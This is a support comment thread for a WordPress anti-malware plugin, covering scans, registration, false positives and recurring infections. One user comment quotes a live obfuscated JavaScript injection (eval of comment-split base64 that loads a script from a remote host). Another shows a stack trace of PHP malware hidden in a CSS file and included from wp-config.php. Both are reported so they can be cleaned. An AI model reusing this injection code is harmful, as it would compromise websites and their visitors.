Here are the recommended channels for receiving support:

  • First Read the FAQs - These Frequently Asked Question may have answers that address your issue.
  • Forum Topics - There may already be a topic that relates to your problem, if not, you can create one.
  • WordPress Forum - If you prefer to use the forum on to get support.

451 Comments on "Support"

  • On April 15, 2024 at 7:38 am, Montenegro said:

    hey guys!! I’m speaking here from Brazil, I use this wonderful tool of yours on all my websites… Next! one of them was affected by some type of malware that I have no idea where it came from… the visitor is redirected to other links when using any search engine. google, bing and etc… when I try to run your antimalware through the wordpress panel, I get the following message…

    I don’t know what this is about… it should also be noted that I’m not good with CSS… Can you help me?

    • On April 15, 2024 at 7:44 am, Montenegro said:

      the code that appears when trying to run your antimalware is:

      Fatal error: Uncaught TypeError: strlen(): Argument #1 ($string) must be of type string, array given in /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94) : eval()’d code:4 Stack trace: #0 /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94) : eval()’d code(4): wpgttade (Array) #1 /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94): eval() #2 /home1/my-host/my-domain/wp-config. php(4): include_once(‘/home1/my-host…’) #3 /home1/my-host/my-domain/wp-load.php(50): require_once(‘/home1/my-host …’) #4 /home1/my-host/my-domain/wp-admin/admin.php(34): require_once(‘/home1/my-host…’) #5 {main} thrown in /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94) : eval()’d code on line 4


      • On April 15, 2024 at 9:12 am, Anti-Malware Admin said:

        This error on your site is being caused by the malware infection. There is malicious PHP code in that CSS file, which would ordinarily not be executable, however it has been included in you wp-config.php file using the this malicious include line that starts with include_once(‘home1/my-host…

        So if you get rid of that include_once that references that CSS file then the error should stop.

  • On March 10, 2024 at 10:41 pm, south side said:

    how can i register multiple websites? is this feature avaialble?

    • On March 11, 2024 at 3:58 pm, Anti-Malware Admin said:

      Yes, you can register as many websites as you want. Just make sure to use the same email address so that they will all be registered to the same account.

  • On February 26, 2024 at 6:55 am, Kelly Normand said:

    I’ve been getting “Password reset” emails constantly for the past few weeks. I would have thought that the “Block XMPRPC” and/or “Brute-force Protection” would take care of this? I double checked with my hosting company, and YES my account is on an Apache server. I get at least 3 or 4 and up to 10 of these per day. I have 61 different sites and they all are using your software. What else can I do?

    • On February 27, 2024 at 3:33 am, Anti-Malware Admin said:

      The “password reset” emails are a function of the login form and has nothing to do with the XMLRPC functions. The Brute-Force Login Protection in my plugin won’t interfere with a user attempting to reset their password because it is not a login attempt and the emails sent out will only go to the registered user.

      I suggest you add the Advanced Google reCAPTCHA plugin By WebFactory Ltd. It can add protection to the login page and the password reset page as well. Understand that it will be impossible to stop hackers from requesting to reset your password if they mimic using the form like any legitimate user would, without also blocking the legitimate users too. So perhaps it is more important that you focus on the other factor that is allowing them to request your password be reset, the fact that they must know your email or username to make that request. Whether you are using the default “admin” username or some other username that they have discovered it would be more effective for you to simply change the username of any users that are receiving these password reset requests so that these request for the wrong username will fail without ever sending any emails, and then your hackers will also no longer have one half of the info needed to login as that user.

  • On February 15, 2024 at 9:29 am, Несериозен Автор said:

    Hi, there. I purchased the plugin in order to be able to scan the core files. But the scan never completes, neither I can get any information about the status. Running for almost 2 days and says ‘has not finished’.
    Is there anything I can do to make this plugin work ? At the moment it does nothing but I paid for it.

    • On February 15, 2024 at 1:35 pm, Anti-Malware Admin said:

      First mark the “Yes” bubble next to “Automatically Update Definitions” and then click “Save”. This will download the core file definitions.

      Then run the Complete Scan again and stay on the results page until you see the results that need to be fixed. This is an active scan so if you leave the page then it can never finish that scan job. I am working on a Resume feature and an Auto-Scan feature but those are not ready yet so you will need to keep your browser on the scan page to to keep it running and then fix any known threats it finds before leaving that page.

  • On February 1, 2024 at 12:34 am, graeme Pike said:

    Hi I have other websites that use a different software to wordpress, could this be a cause for malware to enter and affect all my websites, including the ones built on WordPress?

    • On February 6, 2024 at 4:21 am, Anti-Malware Admin said:

      Malware can come through any vulnerability on any site, WordPress or otherwise. The best tools you have for figuring out where the infections are coming from are the log files on your server. There are usually tons of entries in the log files so it is essential to first know the exact time of any infection. Therefore, it is vital to stat any infected file before you delete, modify, or change it in any way. If you can get the most recent modified/changed times of the affected files before you fix them then you can find the relevant actions in the logs that may correspond to those files being infected. If you have already fixed the infections with my Anti-Malware plugin then the infection times can still be found in the Quarantine.

      Note: Make sure to accommodate for timezone differences in your calculations, as the Anti-Malware Quarantine stores all time values in GMT/UTC and your server logs might be in the server’s local time.

  • On January 19, 2024 at 11:50 am, anthony aiken said:

    I have a question. Obviously I made a donation before running the test which found files and sent to quarantined.
    But I tested again via Sucuri (with cache reseted at the bottom of the page) and it found malware that was not detected with GOTMLS.

    If it helps you, here is the detail of Suciri’s result:
    Known javascript malware: malware.injection?35.62

    More details:
    .lazyload[data-src]{display:none !important;}.lazyload{background-image:none !important;}.lazyload:before{background -image:none !important;}var filjlxtxyoa/*rvxrdwrict*/=/*rvxrdwrict*/eval;/*rvxrdwrict*/var ytwfy/*rvxrdwrict*/=/*rvxrdwrict*/atob; filjlxtxyoa(ytwfy(“d”+/*rvxrdwrict*/”mFy”+/*rvxrdwrict*/”IGNjPTE7d”+/*rvxrdwrict*/”mFy”+/*rvxrdwrict*/”IGQ”+/*ouibk*/” 9ZG9jd”+/*rvxrdwrict*/”W1lbnQ”+/*ouibk*/”7Y2M9Mjt2YXIgcz”+/*kpkv*/”1kLmNy”+/*rvxrdwrict*/”ZWF0″+/*kpkv*/”ZUVs”+/* ouibk*/”ZW1lbnQ”+/*ouibk*/”oInNjcmlwd”+/*rvxrdwrict*/”CIpO2NjPTM7cy”+/*rvxrdwrict*/”5″+/*ouibk*/”z”+/*kpkv*/”cmM9J2h0 “+/*kpkv*/”d”+/*rvxrdwrict*/”HBz”+/*kpkv*/”Oi8vc2Vy”+/*rvxrdwrict*/”d”+/*rvxrdwrict*/”mljZS5″+/*ouibk */”z”+/*kpkv*/”cGVjaWFs”+/*ouibk*/”Y3JhZnRib3guY29tL2g0″+/*kpkv*/”YmZMSCc7Y2M9NDtkLmd”+/*rvxrdwrict*/”ld”+/*rvxrdwrict*/”EVs” +/*ouibk*/”ZW1lbnRz”+/*kpkv*/”Q”+/*ouibk*/”nlUYWd”+/*rvxrdwrict*/”OYW1lKCd”+/*rvxrdwrict*/”oZWFkJy”+/*rvxrdwrict* /”lbMF0″+/*kpkv*/”uYXBwZW5″+/*ouibk*/”kQ”+/*ouibk*/”2hpbGQ”+/*ouibk*/”ocy”+/*rvxrdwrict*/”k7″) );

    thank you for your help.

    • On January 19, 2024 at 3:36 pm, Anti-Malware Admin said:

      It looks like my plugin has actually already removed this threat for you.

      I checked those Sucuri results and the malware shown there was in fact cached from a scan that they ran over 14 hours ago. At the bottom of the page it said:
      Scanned 14 hours ago. Force a Re-scan to clear the cache.

      I click on the Re-scan link and the scan came back clean. Please let me know if you have any further concerns.

  • On January 18, 2024 at 2:31 pm, Admin Elafrishop said:

    Hello. i have an issue (problem). When i clic on scan start button, it doesn’t work. it says this page doesn’t work. in french. please help me.

    • On January 19, 2024 at 4:02 pm, Anti-Malware Admin said:

      This is probably caused by a bug in another plugin or some malicious code that is breaking the page whenever you POST form data to your site. You will first need to check the error_log files on your server to see what code is causing this error and then you can correct that code to proceed with the Malware Scan and/or any other POST forms.

      Let me know what errors you find and I can help you make sense of them and decide how best to fix it.

  • On December 27, 2023 at 5:12 am, Softwares WebindiaInc said:


    We are getting Malware on the site from the Unlimited Element
    plugin. When checking it seems clean.

    please check this screenshot –

    Thank you.

    • On January 3, 2024 at 10:24 am, Anti-Malware Admin said:

      Thanks for reposting this False Positive. I have confirmed that this plugin is not a threat and updates my malware definitions to exclude this code. Please download the latest definition updates and make sure that it is no longer flagging these files on your server.

  • On November 17, 2023 at 6:58 am, Alecs Retin said:

    There is a file with an infection in the site folder [URL redacted for security reasons] and the check can’t find it.

    • On November 18, 2023 at 9:52 am, Anti-Malware Admin said:

      Thank you for sending me this infected file that was not detected. I have added this new variant to my definition updates so that it can now be automatically fixed. Please download the latest definition updates and run the complete scan again to see if it finds any more like this one.

  • On October 18, 2023 at 1:33 pm, Anoosh Mourad said:

    My website is affected by malware and affected files are:
    /home4/najlanco/public_html/backup/wp-includes/header.php: SL-PHP-FILEHACKER-iu.UNOFFICIAL FOUND
    /home4/najlanco/public_html/wp-content/themes/skeleton-reworked/404.php: SL-PHP-FILEMANAGER-md5-gcy.UNOFFICIAL FOUND
    /home4/najlanco/public_html/wp-content/themes/skeleton-reworked/functions.php: SL-PHP-FILEHACKER-iu.UNOFFICIAL FOUND
    /home4/najlanco/public_html/wp-content/themes/joly/functions.php: SL-PHP-FILEHACKER-iu.UNOFFICIAL FOUND
    /home4/najlanco/public_html/wp-content/plugins/trx_updater/assets/wp-load.php: SL-PHP-FILEMANAGER-md5-gcy.UNOFFICIAL FOUND
    /home4/najlanco/public_html/wp-config.php: SL-PHP-FILEHACKER-dui.UNOFFICIAL FOUND

    while using Anti-Malware it will detect all of these files but not sure how to fix that.

    Can you please help me on that.
    Thank you

    • On October 18, 2023 at 2:04 pm, Anti-Malware Admin said:

      Did you download the latest definition updates?

      If you are scanning for all threat type with the latest definition updates (not just Potential Threats) then my plugin will offer to fix those Known Threats for you automatically.

  • On August 9, 2023 at 9:11 am, FireSpike LLC said:

    I am a happy donor to the plugin with many sites using the plugin. I have 3 sites that ALWAYS get stuck at 99% and never progress to completion. I’m working with those sites now, trying full scans one more time. I’ll switch and try other levels of scanning, but I’d really like to be fully confident that EVERYTHING is getting checked and is clear of problems. Any suggestions or support on this would be very much appreciated.

    • On August 9, 2023 at 1:56 pm, Anti-Malware Admin said:

      I have just released a new plugin update (version 4.21.94). Please download the new update and let me know if that fixed the issue for you or not?

      • On August 14, 2023 at 5:06 am, FireSpike LLC said:

        The latest version of the plugin is completing quickly! Thank you for the fix, and thank you for the great product and service!

  • On July 27, 2023 at 10:36 am, Teatro Nacional Web said:

    How can i have a invoice ?
    como puedo tener un recibo de la donación?

  • On July 8, 2023 at 2:22 am, Noleen Kutash said:

    Hello support, I found the Malware using your plugin – thank you very much. Hoever, now I do not know how to get rid of it? Can you tell me what to do from here, please. My host is Siteground.

    • On July 10, 2023 at 5:46 am, Anti-Malware Admin said:

      I don’t see a Registration for your site so you must be running the basic scan which will only identify “Potential Threats”. Do you see all the warnings in Red telling you to download the latest definition updates?

      Once you download the latest definitions then you can run the Complete Scan again to find any “Known Threats” which the plugin will offer an option to Automatically fix them for you.

  • On July 3, 2023 at 11:39 am, Nicole Brooke said:

    My error log is spitting out multiple errors everyday:

    [03-Jul-2023 19:46:28 UTC] PHP Warning: Undefined array key “detected_attacks” in /home/public_html/wp-content/plugins/gotmls/safe-load/wp-login.php on line 63

    can you fix this? Im using Version 4.21.92

    • On July 3, 2023 at 4:02 pm, Anti-Malware Admin said:

      Thanks for reporting this to me. I will have that fixed in my next plugin update which should be soon.

      If you want to fix your copy now you can add these two lines of code to your plugins/gotmls/safe-load/wp-login.php file right after $GLOBALS["GOTMLS"] = array(); on line 10:

      if (!isset($GLOBALS["GOTMLS"]["detected_attacks"]))
      $GLOBALS["GOTMLS"]["detected_attacks"] = ”;

  • On May 16, 2023 at 1:56 am, Marloes ineedit said:

    I think i already fixed the issue. Thank you so much for this great plugin! I donated $29 :)

  • On April 21, 2023 at 11:44 pm, Steven Cooper said:

    Hi there my champion friend
    Please send me a donation link, where ill donate some more cash for you.
    Also, what is the brute force settings? Can i edit? What is the lockout parameter.

    • On April 23, 2023 at 8:19 am, Anti-Malware Admin said:

      The Brute-Force Login Protection works by establishing a persistent session with the client’s browser. Failure to establish a a valid session or more than 3 login attempts on the same session will redirect the connection so that your WP Bootstrap doesn’t even load thus relieving your server of the burden of processing these attacks. This Feature can be enabled in the firewall options after a donation but it is not configurable without modifying the plugin’s source code.

  • On February 27, 2023 at 12:42 am, Miha Primožič said:


    After plugin install there is index.php file in all subdirectories. I know that this is for security reasons as this disable directory browsing.

    Is there any option to disable it? Or disable it for specific directory. Problem is that in another subdirectory is additional site which uses Wordfence which see this file as a threat.

    Best regards,

    • On February 27, 2023 at 3:50 am, Anti-Malware Admin said:

      These new index.php files have nothing to do with my plugin. My Anti-Malware plugin does not create index.php files in every directory. Wordfence is probably correct in reporting that these files are a threat, but just to be sure, can you please email me a few of these files so that I can confirm that they are a known threat?

  • On December 13, 2022 at 7:15 am, serdar kurt said:

    Hi Anti-Malware Admin :)

    can you whitelist this lines please :) :

    DirectoryIndex index.php Default.htm index.html home.html welcome.html default.html index.htm home.htm welcome.htm default.htm index.php3 index.shtml home.shtml index.cgi home.cgi home.wml index.wml index.php4 home.php4 index.php5 index.php6 baustelle.html Index.html Index.htm

    … I get everytime a heartattack ^^ (Whitelist File is not a option, because it´s in the .htaccess File)

    best regards


    • On December 14, 2022 at 7:46 am, Anti-Malware Admin said:

      Absolutely! I see that is a legitimate use of an alternative DirectoryIndex list and not at all malicious, so thanks for pointing it out. I have just updated my definition to exclude this usage from the list of known .htaccess threats. Please download the latest definition updates and let me know if that fixes it for you.

      • On December 14, 2022 at 8:30 am, serdar kurt said:

        You are AWESOME :)

        it works now without heartattack XD
        so i can continue to tell my friends that your plugin is the best virus scanner for WP :)

  • On September 27, 2022 at 10:50 pm, Mahmoudou Sidibe said:

    Hi, I get in WordPress the following message: Your Installation Key is not registered!

    But when I look in my profile I see the installation key and website as registered.

    • On September 28, 2022 at 8:40 am, Anti-Malware Admin said:

      This is usually caused by some kind of caching which prevents your wp-admin page from properly refreshing to show you the current registration info. Sometime the registration check in your wp-admin can also be blocked by your browser’s security setting or some kind of script blocker add-on. Check the Console tab in your browser’s Inspector for any security warnings or JavaScript errors, and/or try disabling any caching plugins. This might also clear up automatically given enough time, if it is a caching issue.

  • On August 24, 2022 at 2:17 pm, serdar kurt said:

    i get attacked permanently and it is very intense to clean it every time … but these codes was not flagged as shady code Oh …

    please update the plugin, i´m not sure that i find everything -.-

    • On August 25, 2022 at 10:56 am, Anti-Malware Admin said:

      Thanks for sending me the Dropbox link with those files. I have added all three of these new variants to my malware definitions. Please download the latest definition updates and run the Complete Scan again to see if there are any more. Please let me know if you find anything else.

  • On June 10, 2022 at 8:46 pm, osman safdar said:

    My sites keep getting infected with “Redirect” malware. I remove them with your plugin every day but next day the malwares keep coming back :(

    Do you have any suggestions for me please?

    • On June 11, 2022 at 10:09 am, Anti-Malware Admin said:

      There is clearly still some vulnerable exploit on your server that is letting hackers reinfect these same files over and over again.

      The best way to find and fix this security whole is to start by getting the exact time of the infect. If you have already cleaned this infection at least once then there will be a record of the infection times on the Anti-Malware Quarantine page in your wp-admin. Once you have the exact times of these infections then you can simply cross-reference those times in the raw access_log files on your server. This will tell you what scripts or URLs were called to infect those files, and that will point you to the file that is vulnerable to this exploit.

      Ask your hosting provider is your not sure where the log files are kept on your server.

  • On June 2, 2022 at 3:56 pm, nicolas gonzalez said:

    Hola estimado,
    tengo problemas para eliminar un archivo que según el diagnóstico es un Error de exploración/lectura.
    Este archivo está terminado en php.
    No me aparece la opción de eliminar.

    • On June 4, 2022 at 7:07 am, Anti-Malware Admin said:

      Un error de exploración/lectura no es un virus, por eso no hay opción de eliminación.

      Este tipo de error solo significa que el escáner no pudo leer el archivo. Por lo tanto, no hay forma de saber si el archivo contiene un virus o no.

      • On June 6, 2022 at 12:02 am, Alin Tagar said:

        Can you solve those Japanese words attract issue if I buy your plugin?

        • On June 7, 2022 at 3:11 pm, Anti-Malware Admin said:

          There is nothing inherently wrong with Japanese words. Many Japanese website contain mostly Japanese words and those are predominately ok to visit if you can read Japanese ;-)

          Now, if you have malware or maliciously inserted ads, that happen to be in Japanese, my plugin should be able to remove the scripts that inserted this malicious content, regardless of what language it’s in.

          If you have already installed my plugin and downloaded the latest definition update and it is not finding any known threats on your site then please email me directly with screenshots of the offending content for further support.

  • On April 19, 2022 at 1:17 pm, Carlos Enrique Ortiz Rangel said:

    Hello Eli… thank you for creating this tool and very happy to make the donation for your work. I have problems of unsolicited redirection of my web page and I already run the plugin without results. Can you help me see what is happening please?

    • On April 19, 2022 at 4:32 pm, Carlos Enrique Ortiz Rangel said:

      Thank you Eli.. your tool finally solved my problem with the website.. thank you very much and I’m glad I found you to have my site protected and safe from malware. We sailors say Bravo-Zulu which means very well done…!!

  • On April 18, 2022 at 6:19 am, Miguel Alarcon said:

    I cant update:

    No response from the server!

    Please help me

    • On April 18, 2022 at 12:56 pm, Anti-Malware Admin said:

      The error “No response from the server” refers to the fact your server is not responding when prompted to check for updates or registration status. This is usually caused by a too strict CSP on your server or a popup/script blocker on your browser. Try clearing your cache and then open the Console tab in your browser’s Inspector and refresh the page to see if there are any JavaScript error to indicate what might be causing this issue in your case. If you need more help then please contact me directly with your specific circumstances.

  • On March 25, 2022 at 5:32 am, Robert Zehrer said:

    I downloaded your plugin and received the key. I then did a scan and everything worked fine. A couple of weeks later, I went to my installed plugins but your plugin was not there. Can I install the plugin again and use the original key?

    • On March 25, 2022 at 11:36 am, Anti-Malware Admin said:

      Once you have registered your site key will stay the same even if you uninstall and reinstall the plugin ;-)

  • On March 25, 2022 at 5:10 am, Jose Luis Nebril de la Fuente said:

    I install the plugin
    in my profile it show as register, but plugin in wp show as not register.
    could any body help me?


    • On March 25, 2022 at 11:38 am, Anti-Malware Admin said:

      This is usually caused by a caching issue or a JavaScript error on the client side. Please try clearing all cache and refreshing you wp-admin, then check your browser’s Console for errors if it still does not show the registration on your end.

      Send me a screenshot if you can’t figure out what’s wrong.

  • On December 12, 2021 at 9:10 pm, LG said:

    Hi – I’m very interested in Gotmis. Is your firewall DNS, with DDoS protection and CDN? Does it feature an SSL-secured firewall and block unauthorized IP addresses? And if not, could I use your plugin along with another plugin or related product (such as GoDaddy’s security software) with the above features, without interference? Or does Gotmis cover those bases in a different way?

    • On December 13, 2021 at 3:39 am, Anti-Malware Admin said:

      Only your nameservers can provider DNS level firewall protection, I recommend using CloudFlare DNS for that. My Brute-Force login protection was specifically designed to thwart the DoS and DDoS affects that are common from brute-force attacks on the wp-login page. I do not employ any method of blocking IP addresses specifically because most attacks are from dynamic sources and blocking users by IP usually ends up with too many false positives. The main focus of my firewall is to block known exploits that are prevalent in WordPress sites and you should be able to use any other firewall in conjunction my plugin to enhance or augment your site’s security.

  • On November 22, 2021 at 9:41 pm, LG said:

    Hi – I’m very interested in your plugin, etc., and truly appreciate your labor and thoughtfulness in creating this plugin and making it so easily available. I will probably download & install it soon – though I hope to receive a reply from you first.
    Although perhaps my concern is misplaced – considering the quality of your reviews! – I’d be a bit more comfortable if your home page were secure (https) before entering my info. (including my alternate email address) to request instant updates. RSVP – Thank you!

    • On November 23, 2021 at 3:55 am, Anti-Malware Admin said:

      Thanks for your interest. All the pages on my site are avail as both secured URLs (using HTTPS) and unsecured URLs (using only HTTP), this is for better compatibility and integration with links that only use HTTP. However, you can simply add an S to the HTTP at the beginning of any URL on my site and the HTTPS URL makes the page secure ;-)

  • On October 9, 2021 at 7:36 am, P deJ said:

    Your donate link is dead?

    • On October 11, 2021 at 8:18 am, Anti-Malware Admin said:

      That page works fine for me and I can find nothing wrong there. You do need to enter your key or login to see the donation options on that page though. If you cannot get it to work then please send me a screenshot so that I can see what you are having trouble with.

  • On September 26, 2021 at 1:18 pm, Scott Krecklow said:

    I just donated and wanted to change the user name (personal email) to reflect in plugin on my site, Do I need to remove and reinstall with my donated user name? I do note see a way to change user names.

    Thanks for 5 great years of keeping my sites healthy.

    • On October 11, 2021 at 8:05 am, Anti-Malware Admin said:

      The best way to fix this is to login to your wp-admin and click on the key in the top-right of the Anti-Malware Settings page to open the pre-filled registration form. Then make sure to submit the right email on that form and it will re-register the key for that site under your correct email. Then any other sites registered under that email address will also reflect your donation.

  • On September 24, 2021 at 7:38 am, Pablo Corona said:

    Hello, we have a licence but the data base definitions never auto update, we have to do it manually, is there a way to fix that? thanks in advance and congrats for the great work!

    • On October 24, 2021 at 3:37 am, Anti-Malware Admin said:

      Sorry for the lateness of my reply, your comment went to my spam folder and I almost missed it. I recently had another report about this same thing happening to someone else too. I think that this might be a caching issue in which the updates are taking place in the background but just not showing up immediately in your wp-admin. If this happens again can you please try simply clearing your cache and refreshing the page to see if it then shows that your definitions are up-to-date? If not then please send me a screenshot and include your registration key so that I can look into this further on my end.

  • On August 21, 2021 at 4:03 am, Neil Smith said:

    Just moved web site to new host. How do I transfer registration?

    • On August 21, 2021 at 10:36 am, Anti-Malware Admin said:

      Just register your new key to the same email address and your registration will be on the same account.

  • On August 6, 2021 at 2:31 am, kimberley morton said:

    hi, scan details disappears if i click auto fix or refresh page eg.. i have to scan again to get the infected files again and takes long time. and auto fix seem not to work even when click button taking to long time. any ideas?

    • On August 6, 2021 at 6:03 am, Anti-Malware Admin said:

      If you refresh the scan results page then the scan will start all over so don’t do that until you’re done or want to rerun the scan. The automatic fix should popup a new window without leaving the scan results and if it’s taking too long then there is a button you can push to see if there are any error messages that might explain why it’s not finishing as expected. If the complete scan is taking a veryl ong time anyway then there might be something wrong on your server that is slowing everything down. You can check the error_log files on your server to see if there is any indication as to what might be causing that problem. If you can email me some screenshots of the scan results and the auto-fix and any error messages you might find then I can help you more.

      • On August 6, 2021 at 7:47 am, kimberley morton said:

        the error message is just number: 1

        • On August 6, 2021 at 8:19 am, kimberley morton said:

          here is a screenshoot

          • On August 9, 2021 at 10:45 am, Anti-Malware Admin said:

            That number 1 is not coming from my plugin. It looks like there is some other plugin that is intercepting the call to admin-ajax.php or maybe there is some other script that is injecting an additional action into the HTML output of my Auto-Fix form so that the auto-fix action is being hijacked and diverted to another action hook.

            You can try deactivating other security plugins or any other plugin that might be interfering to see if the auto-fix works without interference, or you could use the element inspector in your browser to look for additional hidden fields with the name “action” in the auto-fix form that might have been added.

  • On June 15, 2021 at 2:00 am, yigal Perez said:

    Keep getting this message:
    ‘Your Installation Key is not registered!’

    Also console errors:
    Uncaught ReferenceError: WebFont is not defined
    at admin.php?page=GOTMLS-settings:939

    Refused to display ‘’ in a frame because it set ‘X-Frame-Options’ to ‘sameorigin’.

    • On June 18, 2021 at 12:19 pm, Anti-Malware Admin said:

      I just release a new version of the plugin that does not use an iframe for the registration form, so if you update the plugin then you should be able to register.

      that other error about the WebFont has nothing to do with my plugin (I don’t use any WebFonts in my code) so that must be caused by some other plugin that is trying to use a WebFont in your wp-admin.

  • On March 28, 2021 at 10:15 pm, David Crane said:

    Hi Eli,

    longtime since we last chatted. I am getting the following error:
    Invalid or expired Nonce Token! (0161b6df4fcd5827b89547020f7c2ff4 !found)Refresh and try again?

    any advice would be appreciated.


    • On March 30, 2021 at 3:18 am, Anti-Malware Admin said:

      Thanks for asking about this issue. Usually this is caused by leaving your browser open on the Scan Setting page for a long time before starting the scan (and by then the token really has expires). Just refresh the page and try to start the scan again and it should work fine.

      If you are still getting this message after a hard refresh then there may be something wrong with your site. Either there is some plugin or caching software that is caching your wp-admin pages (never a good idea) or maybe your DB is broken and my plugin is not able to save new records to the wp_options table. Test those two possibilities and let me know if you still have any more problems with that error.

    • On August 22, 2022 at 12:10 am, Hafiz Maloof said:

      I have the same problem with the invalid or expired token too.
      any refresh of page took me back the first step to a get free key. when I click to get the key it finds my correct key but when I want to start scanning or save the page it says it is invalid….
      I have cleared the cache, changed the browser, also checked whit a new device but still not successful.
      Is this issue raised for guys with 1 donate for many websites?

      • On August 22, 2022 at 3:57 am, Anti-Malware Admin said:

        This issue has nothing to do with your donation. Your sites are registered and the keys are saved on my end.

        The invalid nonce token issue you are having, combined with your site’s inability to save the registration key on your end, suggests that your server is not able to save records to the wp_options table in your database. This is usually caused a missing or incorrect AUTO_INCREMENT setting in your table, or it could be that your whole database is read-only (either because of a permission issue or no space left on the partition.

        Try manually adding a record to your wp_options table and see what the AUTO_INCREMENT Id value is. You can also email me directly if you need more support.

  • On March 23, 2021 at 9:33 am, paul mangiagalli said:

    Hi, I have several websites that have the WP-VCD malware.

    I have used your plugin and it deletes infected files. but then a day or so later its back?

    Any ideas please?

    • On March 26, 2021 at 3:30 am, Anti-Malware Admin said:

      There must still be a vulnerability on your server that is letting this hacker replace those malicious files on your site just as they did the first time. If your site is clean but the vulnerability is on the server side then you may need to move your site to a more secure hosting environment. You could also ask your hosting provider what they can do to stop these repeated infections but many time the hosting support is not that helpful in these types of situations.

  • On January 4, 2021 at 7:23 pm, Mahmoud Farouqi said:

    Hello Eli,

    I had 4 registrations using your plugin, donated 4 times and I wanted to reinstall the plugin on my website after I moved it to a new server. I clicked unregister thinking that will allow me to do that … but it deleted the key all together. Can you please help. I cannot figure out how to register my new installation.


    • On January 5, 2021 at 11:56 am, Anti-Malware Admin said:

      Just click “Get FREE Key” and register that new key under the same email address and it will show your donation. Be sure to refresh you wp-admin if it doesn’t show up right after you re-register, and you might need to clear your cache if you browser does not show any changes on your Anti-Malware Setting page.

  • On December 3, 2020 at 12:02 am, Andre Filipe Santos said:

    If i donate and upgrade my account, i will be able to use in multiple websites or just in one website?

    • On December 3, 2020 at 2:12 pm, Anti-Malware Admin said:

      One donation will unlock the current premium features on all sites that are registered under the same email account ;-)


Leave a Reply

Your email address will not be published. Required fields are marked *


You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>